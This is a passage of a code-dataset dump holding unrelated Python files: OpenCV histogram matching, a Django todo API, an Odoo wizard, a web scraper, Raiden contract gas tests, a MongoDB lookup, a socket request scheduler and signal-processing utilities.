np.cumsum(s_counts).astype(np.float64)\r\n s_quantiles /= s_quantiles[-1]\r\n t_quantiles = np.cumsum(t_counts).astype(np.float64)\r\n t_quantiles /= t_quantiles[-1]\r\n\r\n # interpolate linearly to find the pixel values in the template image\r\n # that correspond most closely to the quantiles in the source image\r\n interp_t_values = np.interp(s_quantiles, t_quantiles, t_values)\r\n\r\n return interp_t_values[bin_idx].reshape(oldshape)\r\n\r\ndef main():\r\n histBGR(\"messi5.jpg\")\r\n histEqual(\"treelc.jpg\")\r\n histColorMatch(\"f1.jpg\", \"f5.jpg\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"OpenCV-Examples/Image Histograms/other-histogram-functions.py","file_name":"other-histogram-functions.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"415187528","text":"# -*- coding: utf-8 -*-\n\nimport json\n\nfrom django.views.generic import View\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom django.shortcuts import get_object_or_404\n\nfrom .models import TodoManager, Todo\n\n\nclass IndexView(View):\n\ttemplate_name = 'primary_app/index.html'\n\n\tdef get(self, request, *args, **kwargs):\n\t\treturn render(request, self.template_name)\n\n\nclass TodosView(View):\n\t@method_decorator(csrf_exempt)\n\tdef dispatch(self, request, *args, **kwargs):\n\t return super(TodosView, self).dispatch(request, *args, **kwargs)\n\n\tdef get(self, request, *args, **kwargs):\n\t\tif kwargs.has_key('id'):\n\t\t\tobj = get_object_or_404(Todo, id=kwargs['id'])\n\t\t\tresult = 
json.dumps(obj.get_data_dict())\n\t\t\treturn HttpResponse(result)\n\t\telse:\n\t\t\tresult = TodoManager.get_all_todos()\n\t\t\treturn HttpResponse(result)\n\n\tdef post(self, request, *args, **kwargs):\n\t\traw_data = request.body\n\t\tparsed_data = json.loads(raw_data)\n\t\tdone = parsed_data['done']\n\t\ttodo = parsed_data['todo']\n\t\tif done == '1':\n\t\t\tdone = True\n\t\telif done == '0':\n\t\t\tdone = False\n\t\tobj = Todo(\n\t\t\tdone=done,\n\t\t\ttodo=todo\n\t\t\t)\n\t\tobj.save()\n\t\tresult = json.dumps({\n\t\t\t'id': obj.id,\n\t\t})\n\t\treturn HttpResponse(result)\n\n\tdef delete(self, request, *args, **kwargs):\n\t\tid = kwargs['id']\n\t\tobj = Todo.objects.get(id=id)\n\t\tobj.delete()\n\t\treturn HttpResponse(status=204)\n\n\tdef put(self, request, *args, **kwargs):\n\t\traw_data = request.body\n\t\tparsed_data = json.loads(raw_data)\n\n\t\to_id = parsed_data['id']\n\t\tobj = get_object_or_404(Todo, id=o_id)\n\n\t\tif parsed_data.has_key('done'):\n\t\t\tobj.done = parsed_data['done']\n\t\tif parsed_data.has_key('todo'):\n\t\t\tobj.todo = parsed_data['todo']\n\n\t\tobj.save()\n\t\treturn HttpResponse(status=204)\n\n","sub_path":"primary_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"397394651","text":"#!/usr/bin/env python\n\n# enums.py\n#\n# Sam Heilbron\n# Last Updated: December 8, 2016\n#\n# List of enums:\n#\t\tColor\n\n\ndef enum(**named_values):\n\treturn type('Enum', (), named_values)\n\nColor = enum(\n\tBLACK \t= (0, 0, 0),\n\tWHITE \t= (255, 255, 255),\n\tRED \t= (0, 0, 255),\n\tGREEN \t= (0, 255, 0),\n\tBLUE \t= (255, 0, 0),\n\tYELLOW\t= (0, 255, 255))\n\nDatatypes = enum(\n\tFLOAT64 = 'float64',\n\tINT\t\t= 'int',\n\tINT16\t= 'int16',\n\tUINT8\t= 'uint8')","sub_path":"ws_interlace/number_recognition/enums.py","file_name":"enums.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"504812862","text":"# Created By: Virgil Dupras\n# Created On: 2006/11/18\n# Copyright 2010 Hardcoded Software (http://www.hardcoded.net)\n# \n# This software is licensed under the \"BSD\" License as described in the \"LICENSE\" file, \n# which should be included with this package. The terms are also available at \n# http://www.hardcoded.net/licenses/bsd_license\n\nimport os\nimport os.path as op\n\nimport hsfs as fs\nfrom hsfs import phys\nfrom hsfs.stats import StatsList\nfrom hscommon.conflict import get_unconflicted_name, get_conflicted_name\nfrom hscommon.util import tryint, format_size, format_time, multi_replace\nfrom jobprogress.job import JobCancelled\nfrom hscommon.reg import RegistrableApplication\n\nfrom . 
import design\nfrom .fs_utils import BatchOperation, FS_FORBIDDEN\nfrom .util import clean_empty_dirs\nfrom .sqlfs.music import Root, VOLTYPE_CDROM, VOLTYPE_FIXED, MODE_PHYSICAL, MODE_NORMAL\n\nclass MusicGuru(RegistrableApplication):\n VERSION = '1.4.3'\n \n def __init__(self, appdata=None):\n RegistrableApplication.__init__(self, appid=3)\n if appdata is None:\n appdata = op.expanduser(op.join('~', '.hsoftdata', 'musicguru'))\n self.appdata = appdata\n if not op.exists(self.appdata):\n os.makedirs(self.appdata)\n self.collection = Root(op.join(appdata, 'music.db'))\n self.board = design.Board()\n \n def AddLocation(self, path, name, removeable, job):\n vol_type = VOLTYPE_CDROM if removeable else VOLTYPE_FIXED\n ref = phys.music.Directory(None, path)\n self.collection.add_volume(ref, name, vol_type, job)\n \n def CanAddLocation(self, path, name):\n # Returns an empty string if it is possible to add the location, and an error msg otherwise.\n if not name:\n return \"A location cannot have an empty name.\"\n if name in self.collection:\n return \"'%s' is already in your collection. Choose another name.\" % name\n if (not path) or (not os.path.exists(path)):\n return \"'%s' is not a valid directory.\" % path\n already_there = [location for location in self.collection \n if (location.vol_type != VOLTYPE_CDROM) and (str(location.physical_path) == path)]\n if already_there:\n return \"The directory '%s' is already in your collection as the location '%s'.\" % (path,already_there[0].name)\n return \"\"\n \n def GetSelectionInfo(self, item):\n def output_stats(info, item):\n info.append(('Size',format_size(item.get_stat('size'),2)))\n info.append(('Time',format_time(item.get_stat('duration'), with_hours=False)))\n info.append(('Extensions',','.join(item.get_stat('extension',[]))))\n info.append(('# Artists',len(item.get_stat('artist',[]))))\n info.append(('# Albums',len(item.get_stat('album',[]))))\n info.append(('# Genres',len(item.get_stat('genre',[]))))\n stats = item.get_stat('year',[])\n years = [tryint(s) for s in stats if s]\n if not years:\n years = [0]\n minyear = min(years)\n maxyear = max(years)\n info.append(('Years',\"%d - %d\" % (minyear,maxyear)))\n \n new_info = []\n if isinstance(item,list) and (len(item) == 1):\n item = item[0]\n if isinstance(item,list):\n if item:\n new_item = StatsList()\n #remove all items with their parent in the list\n new_item += [child for child in item if child.parent not in item]\n new_info.append(('Selection',\"%d selected\" % len(item)))\n filecount = new_item.get_stat('filecount')\n if filecount is None:\n filecount = 0\n filecount += len([child for child in new_item if not child.is_container])\n new_info.append(('Songs',filecount))\n output_stats(new_info,new_item)\n elif item.is_container:\n new_info.append(('Path',str(item.path[1:])))\n new_info.append(('Songs',item.get_stat('filecount')))\n output_stats(new_info,item)\n else:\n new_info.append(('Filename',item.name))\n new_info.append(('Directory',str(item.parent.path[1:])))\n new_info.append(('Title',item.title))\n new_info.append(('Artist',item.artist))\n new_info.append(('Album',item.album))\n new_info.append(('Genre',item.genre))\n new_info.append(('Year',item.year))\n new_info.append(('Track',\"%02d\" % item.track))\n new_info.append(('Size',format_size(item.size,2)))\n new_info.append(('Time',format_time(item.duration, with_hours=False)))\n new_info.append(('Bitrate',item.bitrate))\n new_info.append(('Comment',item.comment))\n return new_info\n \n def new_folder(self, parent):\n new_name = 
get_conflicted_name(parent, 'New Folder')\n new_folder = fs.manual.AutoMerge(parent, new_name)\n return new_folder.name\n \n def RemoveEmptyDirs(self):\n self.board.clean_empty_dirs()\n self.board.ignore_box.clean_empty_dirs()\n \n def RenameNode(self,node,new_name):\n #Returns what the node has actually been renamed to\n node.name = multi_replace(new_name,FS_FORBIDDEN)\n return node.name\n \n def SwitchConflictAndOriginal(self,node):\n original_name = get_unconflicted_name(node.name)\n try:\n original = node.parent[original_name]\n old_name = node.name\n original.name = '__switching__'\n node.name = original_name\n original.name = old_name\n except KeyError:\n node.name = original_name\n return original\n \n #---Materialize\n def CopyOrMove(self,copy,destination,job,on_need_cd):\n job = job.start_subjob(2)\n for location in self.board.locations:\n location.mode = MODE_PHYSICAL\n try:\n bo = BatchOperation(self.board,destination)\n bo.OnNeedCD = on_need_cd\n if copy:\n bo.copy(job)\n else:\n bo.rename(job)\n for location in self.board.locations:\n if location.vol_type != VOLTYPE_CDROM:\n try:\n clean_empty_dirs(location.path, files_to_delete=['.DS_Store'])\n except EnvironmentError:\n pass\n location.mode = MODE_NORMAL\n self.collection.update_volumes(job)\n except JobCancelled:\n for location in self.board.locations:\n location.mode = MODE_NORMAL\n \n def RenameInRespectiveLocations(self,job):\n #XXX Refactor: Return value isn't used in any gui port.\n for location in self.board.locations:\n if location.vol_type == VOLTYPE_CDROM:\n return 1\n j = job.start_subjob(len(self.board.locations) + 1)\n try:\n for location in self.board.locations:\n location.mode = MODE_PHYSICAL\n destination = location.path\n source_list = [song for song in self.board.allfiles if location in song.original.parents]\n bo = BatchOperation(source_list,destination)\n bo.rename(j)\n try:\n clean_empty_dirs(location.path, files_to_delete=['.DS_Store'])\n except EnvironmentError:\n pass\n location.mode = MODE_NORMAL\n self.collection.update_volumes(j)\n return 0\n except JobCancelled:\n return 2\n","sub_path":"core/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"355480121","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# Copyright (c) 2021-Present IjVine Corporation ()\n\n##############################################################################\n\nfrom odoo import api,fields,models,_\nfrom logging import getLogger\n_logger=getLogger(__name__)\n\n\nclass FeedSyncWizard(models.TransientModel):\n\t_name='feed.sync.wizard'\n\t_description='Evaluate Feeds Wizard'\n\n\tchannel_id=fields.Many2one(\n\t\tcomodel_name='multi.channel.sale',\n\t\tstring='Channel ID',\n\t\trequired=True,\n\t\treadonly=True,\n\t\tdomain=[('state','=','validate')]\n\t)\n\n\tfeed_type=fields.Selection(\n\t\tselection=[\n\t\t\t('product.feed','Product'),\n\t\t\t('category.feed','Category'),\n\t\t\t('order.feed','Order'),\n\t\t\t('partner.feed','Partner'),\n\t\t\t('shipping.feed','Shipping')\n\t\t],\n\t\tstring='Feed Type',\n\t\trequired=True\n\t)\n\n\tdef action_sync_feed(self):\n\t\tself.ensure_one()\n\t\tres = self.env[self.feed_type].search(\n\t\t\t[\n\t\t\t\t('channel_id','=',self.channel_id.id),\n\t\t\t\t('state','!=','done'),\n\t\t\t]\n\t\t).with_context(channel_id=self.channel_id).import_items()\n\t\treturn 
res\n","sub_path":"ijvine_ebay/ijvine_ebay_base/wizard/feed_wizard.py","file_name":"feed_wizard.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312556023","text":"import urllib.request as req\nfrom bs4 import BeautifulSoup\nimport requests\n'''\n \n'''\nurl=\"https://movie.naver.com/movie/sdb/rank/rmovie.nhn\"\nmovie_data=requests.get(url)\nmovie_data=movie_data.text\n#print(movie_data)\nsoup=BeautifulSoup(movie_data,'html.parser')\nmList=soup.select(\".title > .tit3 > a\")\nfor movie_title in mList:\n print(movie_title.attrs['href'])\n print(movie_title.text)","sub_path":"PythonBasicProject6/python_basic/basic6.py","file_name":"basic6.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"202220497","text":"from raiden_contracts.constants import (\n CONTRACT_ENDPOINT_REGISTRY,\n CONTRACT_TOKEN_NETWORK_REGISTRY,\n CONTRACT_TOKEN_NETWORK,\n CONTRACT_SECRET_REGISTRY,\n TEST_SETTLE_TIMEOUT_MIN,\n TEST_SETTLE_TIMEOUT_MAX,\n)\nfrom raiden_contracts.utils.pending_transfers import get_pending_transfers_tree, get_locked_amount\nfrom raiden_contracts.utils.merkle import get_merkle_root\n\n\ndef test_token_network_registry(\n web3,\n deploy_tester_contract_txhash,\n secret_registry_contract,\n custom_token,\n print_gas,\n):\n \"\"\" Abusing pytest to print the deployment gas cost of TokenNetworkRegistry \"\"\"\n txhash = deploy_tester_contract_txhash(\n CONTRACT_TOKEN_NETWORK_REGISTRY,\n [],\n [\n secret_registry_contract.address,\n int(web3.version.network),\n TEST_SETTLE_TIMEOUT_MIN,\n TEST_SETTLE_TIMEOUT_MAX,\n ],\n )\n print_gas(txhash, CONTRACT_TOKEN_NETWORK_REGISTRY + ' DEPLOYMENT')\n\n\ndef test_token_network_deployment(\n web3,\n get_accounts,\n print_gas,\n custom_token,\n secret_registry_contract,\n deploy_tester_contract_txhash,\n):\n \"\"\" Abusing pytest to print the deployment gas cost of TokenNetwork \"\"\"\n deprecation_executor = get_accounts(1)[0]\n txhash = deploy_tester_contract_txhash(\n CONTRACT_TOKEN_NETWORK,\n [],\n [\n custom_token.address,\n secret_registry_contract.address,\n int(web3.version.network),\n TEST_SETTLE_TIMEOUT_MIN,\n TEST_SETTLE_TIMEOUT_MAX,\n deprecation_executor,\n ],\n )\n print_gas(txhash, CONTRACT_TOKEN_NETWORK + ' DEPLOYMENT')\n\n\ndef test_token_network_create(\n print_gas,\n custom_token,\n secret_registry_contract,\n token_network_registry_contract,\n contract_deployer_address,\n):\n \"\"\" Abusing pytest to print gas cost of TokenNetworkRegistry's createERC20TokenNetwork() \"\"\"\n txn_hash = token_network_registry_contract.functions.createERC20TokenNetwork(\n custom_token.address,\n ).transact({'from': contract_deployer_address})\n\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK_REGISTRY + ' createERC20TokenNetwork')\n\n\ndef test_secret_registry(secret_registry_contract, print_gas):\n \"\"\" Abusing pytest to print gas cost of SecretRegistry's registerSecret() \"\"\"\n secret = b'secretsecretsecretsecretsecretse'\n txn_hash = secret_registry_contract.functions.registerSecret(secret).transact()\n print_gas(txn_hash, CONTRACT_SECRET_REGISTRY + '.registerSecret')\n\n\ndef test_channel_cycle(\n web3,\n token_network,\n create_channel,\n channel_deposit,\n secret_registry_contract,\n get_accounts,\n print_gas,\n create_balance_proof,\n create_balance_proof_update_signature,\n):\n \"\"\" Abusing pytest to print gas costs of TokenNetwork's operations \"\"\"\n (A, 
B, C, D) = get_accounts(4)\n settle_timeout = 11\n\n (channel_identifier, txn_hash) = create_channel(A, B, settle_timeout)\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.openChannel')\n\n (channel_identifier2, txn_hash) = create_channel(C, D, settle_timeout)\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.openChannel')\n\n txn_hash = channel_deposit(channel_identifier, A, 20, B)\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.setTotalDeposit')\n\n txn_hash = channel_deposit(channel_identifier, B, 10, A)\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.setTotalDeposit')\n\n pending_transfers_tree1 = get_pending_transfers_tree(web3, [1, 1, 2, 3], [2, 1])\n locksroot1 = get_merkle_root(pending_transfers_tree1.merkle_tree)\n locked_amount1 = get_locked_amount(pending_transfers_tree1.transfers)\n\n pending_transfers_tree2 = get_pending_transfers_tree(web3, [3], [], 7)\n locksroot2 = get_merkle_root(pending_transfers_tree2.merkle_tree)\n locked_amount2 = get_locked_amount(pending_transfers_tree2.transfers)\n\n balance_proof_A = create_balance_proof(\n channel_identifier,\n A,\n 10,\n locked_amount1,\n 5,\n locksroot1,\n )\n balance_proof_B = create_balance_proof(\n channel_identifier,\n B,\n 5,\n locked_amount2,\n 3,\n locksroot2,\n )\n balance_proof_update_signature_B = create_balance_proof_update_signature(\n B,\n channel_identifier,\n *balance_proof_A,\n )\n\n for lock in pending_transfers_tree1.unlockable:\n txn_hash = secret_registry_contract.functions.registerSecret(lock[3]).transact({'from': A})\n print_gas(txn_hash, CONTRACT_SECRET_REGISTRY + '.registerSecret')\n\n for lock in pending_transfers_tree2.unlockable:\n txn_hash = secret_registry_contract.functions.registerSecret(lock[3]).transact({'from': A})\n print_gas(txn_hash, CONTRACT_SECRET_REGISTRY + '.registerSecret')\n\n txn_hash = token_network.functions.closeChannel(\n channel_identifier,\n B,\n *balance_proof_B,\n ).transact({'from': A})\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.closeChannel')\n\n txn_hash = token_network.functions.updateNonClosingBalanceProof(\n channel_identifier,\n A,\n B,\n *balance_proof_A,\n balance_proof_update_signature_B,\n ).transact({'from': B})\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.updateNonClosingBalanceProof')\n\n web3.testing.mine(settle_timeout)\n txn_hash = token_network.functions.settleChannel(\n channel_identifier,\n B,\n 5,\n locked_amount2,\n locksroot2,\n A,\n 10,\n locked_amount1,\n locksroot1,\n ).transact()\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.settleChannel')\n\n txn_hash = token_network.functions.unlock(\n channel_identifier,\n A,\n B,\n pending_transfers_tree2.packed_transfers,\n ).transact()\n print_gas(txn_hash, '{0}.unlock {1} locks'.format(\n CONTRACT_TOKEN_NETWORK,\n len(pending_transfers_tree2.transfers),\n ))\n\n txn_hash = token_network.functions.unlock(\n channel_identifier,\n B,\n A,\n pending_transfers_tree1.packed_transfers,\n ).transact()\n print_gas(txn_hash, '{0}.unlock {1} locks'.format(\n CONTRACT_TOKEN_NETWORK,\n len(pending_transfers_tree1.transfers),\n ))\n\n\ndef test_endpointregistry_gas(endpoint_registry_contract, get_accounts, print_gas):\n \"\"\" Abusing pytest to print gas cost of EndpointRegistry's registerEndpoint() \"\"\"\n (A, B) = get_accounts(2)\n ENDPOINT = '127.0.0.1:38647'\n txn_hash = endpoint_registry_contract.functions.registerEndpoint(ENDPOINT).transact({\n 'from': A,\n })\n print_gas(txn_hash, CONTRACT_ENDPOINT_REGISTRY + 
'.registerEndpoint')\n","sub_path":"raiden_contracts/tests/test_print_gas.py","file_name":"test_print_gas.py","file_ext":"py","file_size_in_byte":6778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"179869582","text":"import pandas as pd\nimport json\nfrom itertools import groupby\nimport pymongo\nimport re\nimport sys\n\n\ndef convert(ind):\n outlist = [ind['word'],]\n for k, v in ind['position'].items():\n outlist.append(k)\n outlist.append(str(len(v)))\n outlist.append(str(len(v)))\n for item in v:\n outlist.append(item)\n return outlist\n\n \ndef get_position(query):\n \n myclient = pymongo.MongoClient(\"8.209.74.127:27017\")\n\n mydb = myclient[\"reverseIndex\"]\n mycol = mydb[\"index\"]\n \n r = []\n\n for word in query:\n for i in mycol.find({\"word\" : word}):\n r.append(i)\n \n totallist = [convert(i) for i in r]\n \n return json.dumps(totallist)","sub_path":"from_mongo_to_json.py","file_name":"from_mongo_to_json.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"207387137","text":"import sched\nimport time\nimport datetime\nimport socket\nimport ast\nimport sys\n\nfrom django.core.management.base import BaseCommand\nfrom Parser.models import Request, ParseResult\n\n\ndef time_func():\n\treturn datetime.datetime.now(datetime.timezone.utc)\n\ndef delay_func(delay):\n\tseconds = 0\n\tif isinstance(delay, datetime.timedelta):\n\t\tseconds = delay.total_seconds()\n\ttime.sleep(seconds)\n\nTIME_FUNC = time_func\nDELAY_FUNC = delay_func\nSCHEDULER = sched.scheduler(TIME_FUNC, DELAY_FUNC)\nSOCK = None\nSERV_ADDR = ('127.0.0.1', 81)\n\ndef update_model(model_obj, data):\n\tParseResult.objects.create(\n\t\t\trequest=model_obj,\n\t\t\tencoding=data['encode'],\n\t\t\ttitle=data['title'],\n\t\t\th1=data['h1'])\n\ndef get_response(request):\n\t\"\"\"\n\tManage one cycle of data swap in the client-server system.\n\tReturn: bytes object\n\t\"\"\"\n\tglobal SOCK\n\tSOCK = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ttry:\n\t\tSOCK.connect(SERV_ADDR)\n\texcept ConnectionRefusedError:\n\t\tSOCK.close()\n\t\tprint('ERROR: Server is not reachable. 
Check connection settings.')\n\t\tsys.exit()\n\tSOCK.sendall(bytes(request, 'cp1251'))\n\tresponse = SOCK.recv(1024)\n\tSOCK.close()\n\treturn response\n\ndef handle(request):\n\t\"\"\"\n\tExecute model update logic.\n\t\"\"\"\n\tresponse = get_response(request)\n\tif response == b'null' or response == b'':\n\t\treturn\n\tresponse = response.decode('utf-8')\n\t# the server replies with a str(dict) payload holding the 'encode', 'title' and 'h1' keys\n\tresponse_dict = ast.literal_eval(response)\n\trequest_obj = Request.objects.filter(url=request).first()\n\tif ParseResult.objects.filter(request=request_obj).exists():\n\t\treturn\n\tif response_dict is not None:\n\t\tupdate_model(request_obj, response_dict)\n\n\ndef add_event(request, when):\n\tSCHEDULER.enterabs(when, 0, handle, kwargs={'request': request})\n\ndef load_events(with_old):\n\trequests = None\n\tif with_old == True:\n\t\trequests = Request.objects.all()\n\telif with_old == False:\n\t\trequests = Request.objects.filter(handling_time__gte=TIME_FUNC())\n\tfor r in requests:\n\t\tadd_event(r.url, r.handling_time)\n\nclass Command(BaseCommand):\n\thelp = 'Schedule requests to server and manage model update based on response.'\n\n\tdef handle(self, *args, **kwargs):\n\t\tload_events(with_old=True)\n\t\tSCHEDULER.run()","sub_path":"Parser/management/commands/runscheduler.py","file_name":"runscheduler.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"345575625","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport itertools\nimport math\n\nimport numpy as np\nfrom scipy.linalg import norm, svd\nfrom scipy.signal import decimate\n\n# general messages for LM/etc optimization\nTERMINATION_MESSAGES = {\n None: \"Status returned `None`. Error.\",\n -1: \"Improper input parameters status returned from `leastsq`\",\n 0: \"The maximum number of iterations is exceeded.\",\n 1: \"`gtol` termination condition is satisfied. (small change in Jacobian)\",\n 2: \"`ftol` termination condition is satisfied. (small change in cost)\",\n 3: \"`xtol` termination condition is satisfied. (small step)\",\n 4: \"Both `ftol`(cost) and `xtol`(step) termination conditions are satisfied.\"\n}\n\n\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n\ndef next_pow2(i):\n \"\"\"\n Find the exponent of the next power of two\n\n >>> next_pow2(5)\n 3\n >>> next_pow2(250)\n 8\n \"\"\"\n # do not use NumPy here, math is much faster for single values\n exponent = math.ceil(math.log(i) / math.log(2))\n # the value: int(math.pow(2, exponent))\n return exponent\n\n\ndef prime_factor(n):\n \"\"\"Find the prime factorization of n\n\n Efficient implementation. Find the factorization by trial division, using\n the optimization of dividing only by two and the odd integers.\n\n An improvement on trial division by two and the odd numbers is wheel\n factorization, which uses a cyclic set of gaps between potential primes to\n greatly reduce the number of trial divisions. 
Here we use a 2,3,5-wheel\n\n Factoring wheels have the same O(sqrt(n)) time complexity as normal trial\n division, but will be two or three times faster in practice.\n\n >>> list(prime_factor(90))\n [2, 3, 3, 5]\n \"\"\"\n f = 2\n increments = itertools.chain(\n [1, 2, 2], itertools.cycle([4, 2, 4, 2, 4, 6, 2, 6]))\n for incr in increments:\n if f*f > n:\n break\n while n % f == 0:\n yield f\n n //= f\n f += incr\n if n > 1:\n yield n\n\n\ndef dsample(y, q, zero_phase=True):\n \"\"\"Low-pass filtering and downsampling.\n\n The input can be downsampled(ie. u[::q]) as it does not contain higher\n harmonics, but y needs to be low-pass filtered in order to avoid aliasing.\n\n If `zero_phase` is ``True``, phase shift will be prevented by shifting the\n output back by the filter's group delay. There will be small edge effects\n in first and last period. If ``False`` the first period is removed due to\n filter-edge effects.\n\n NOTE: There seem to be some issues for `zero_phase=False`. Use `True` unless\n you know what you are doing. Probably related to phase shift.\n\n See :func:`scipy.signal.decimate`\n\n Parameters\n ----------\n y: ndarray(Nt,p,R,P)\n q: int, downsample factor\n zero_phase: bool, default True\n\n Returns\n -------\n y: (N,p,R,P) decimated signal\n\n \"\"\"\n Nt, p, R, P = y.shape\n y = np.moveaxis(y, 3, 1).reshape(Nt*P, p, R, order='F')\n\n # prime factor decomposition.\n drate = list(prime_factor(q))\n\n # actually all this is not necessary. Because: N = Nt/q\n # length of decimated signal. Found from matlab help of decimate\n x = Nt*P\n for factor in drate:\n x = np.ceil(x/factor).astype(int)\n\n # decimated time points per period. Shall be integer!\n N = x/P\n assert N % 1 == 0, ('The dfactor does not match number of periods and '\n 'time points!')\n N = int(N)\n\n # zero_phase = True results in small edge effects in first and last\n # period. Instead we can use lfilter, resulting in large edge effects in\n # first period. But even if we discard this period, there will still be\n # a phase shift\n for factor in drate:\n y = decimate(y, q=factor, ftype='fir', axis=0, zero_phase=zero_phase)\n\n y = np.moveaxis(y.reshape(N, P, p, R, order='F'), 1, 3)\n if zero_phase:\n return y\n else:\n # Remove first period to eliminate the edge effects due to the low-pass\n # filter.\n return y[..., 1:]\n\n\n
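# Added illustrative sketch (commentary, not part of the original pyvib source): a minimal\n# shape check for dsample, assuming a signal with Nt=1000 samples, p=1 output, R=2\n# realizations, P=4 periods and an overall decimation factor q=10 (prime factors 2 and 5).\nif __name__ == \"__main__\":\n _y = np.random.randn(1000, 1, 2, 4) # (Nt, p, R, P)\n # N = Nt/q = 100 decimated time points per period; the (N, p, R, P) layout is preserved\n assert dsample(_y, 10).shape == (100, 1, 2, 4)\n\n\n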
The docs states that the scope is the defining\n module not the calling.\n\n Example for `oneliner` without using namespace(can only be used local)\n for varName in data.files:\n exec(varName + \" = data['\" + varName + \"']\")\n\n Notes:\n ------\n https://docs.python.org/3/library/functions.html#globals\n \"\"\"\n data = np.load(npz_file)\n for varName in data:\n try:\n namespace[varName] = data[varName].item()\n except ValueError:\n namespace[varName] = data[varName]\n\n\ndef window(iterable, n=3):\n \"\"\"Returns a sliding window (of width n) over data from the iterable\n s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ...\"\"\"\n # https://stackoverflow.com/a/6822773/1121523\n it = iter(iterable)\n result = tuple(itertools.islice(it, n))\n if len(result) == n:\n yield result\n for element in it:\n result = result[1:] + (element,)\n yield result\n\n\ndef rescale(x, mini=None, maxi=None):\n \"\"\"Rescale x to 0-1.\n\n If mini and maxi is given, then they are used as the values that get scaled\n to 0 and 1, respectively\n\n Notes\n -----\n To 0..1:\n z_i = (x_i− min(x)) / (max(x)−min(x))\n\n Or custom range:\n a = (maxval-minval) / (max(x)-min(x))\n b = maxval - a * max(x)\n z = a * x + b\n\n \"\"\"\n if hasattr(x, \"__len__\") is False:\n return x\n\n if mini is None:\n mini = np.min(x)\n if maxi is None:\n maxi = np.max(x)\n return (x - mini) / (maxi - mini)\n\n\ndef meanVar(Y, isnoise=False):\n \"\"\"\n Y = fft(y)/nsper\n\n Parameters\n ----------\n Y : ndarray (ndof, nsper, nper)\n Y is the fft of y\n \"\"\"\n\n # number of periods\n p = Y.shape[2]\n\n # average over periods\n Ymean = np.sum(Y, axis=2) / p\n\n # subtract column mean from y in a broadcast way. Ie: y is 3D matrix and\n # for every 2D slice we subtract y_mean. Python automatically\n # broadcast(repeat) y_mean.\n # https://scipy.github.io/old-wiki/pages/EricsBroadcastingDoc\n Y0 = Y - Ymean[..., None]\n\n W = []\n # weights. Only used if the signal is noisy and multiple periods are\n # used\n if p > 1 and isnoise:\n W = np.sum(np.abs(Y0)**2, axis=2)/(p-1)\n\n return Ymean, W\n\n\ndef weightfcn(cov):\n \"\"\"Calculate weight. For subspace is the square inverse of covG. For\n pnlss it is the square inverse of covY\"\"\"\n F = cov.shape[0]\n covinvsq = np.empty_like(cov)\n for f in range(F):\n covinvsq[f] = matrix_square_inv(cov[f])\n return covinvsq\n\n\ndef matrix_square_inv(A):\n \"\"\"Calculate the inverse of the matrix square root of `A`\n Calculate `X` such that XX = inv(A)\n `A` is assumed positive definite, thus the all singular values are strictly\n positive. Given the svd decomposition A=UsVᴴ, we see that\n AAᴴ = Us²Uᴴ (remember (UsV)ᴴ = VᴴsUᴴ) and it follows that\n (AAᴴ)⁻¹/² = Us⁻¹Uᴴ\n Returns\n -------\n X : ndarray(n,n)\n Inverse of matrix square root of A\n Notes\n -----\n See the comments here.\n https://math.stackexchange.com/questions/106774/matrix-square-root\n \"\"\"\n U, s, _ = svd(A, full_matrices=False)\n return U * 1/np.sqrt(s) @ U.conj().T\n\n\ndef mmul_weight(mat, weight):\n \"\"\"Add weight. 
